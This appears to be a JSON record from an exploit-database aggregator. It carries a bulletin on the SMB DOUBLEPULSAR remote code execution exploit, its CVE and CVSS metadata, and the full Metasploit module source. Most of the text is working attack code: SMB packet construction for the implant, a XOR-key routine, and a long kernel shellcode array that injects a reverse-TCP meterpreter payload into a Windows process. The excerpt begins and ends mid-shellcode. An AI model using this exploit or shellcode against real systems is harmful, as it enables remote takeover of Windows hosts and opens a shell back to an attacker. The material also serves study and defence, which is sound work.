\"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-18] #"}, "lastseen": "2021-10-18T18:16:51", "differentElements": ["sourceData"], "edition": 47}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "cb989386f33f92691235ca91acca860a", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-10-18T22:16:33", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27802", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "700099.PRM", "MS17-010.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96709", "SMNTC-96706", "SMNTC-96704", "SMNTC-96705", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-18T22:16:33", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-18T22:16:33", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n 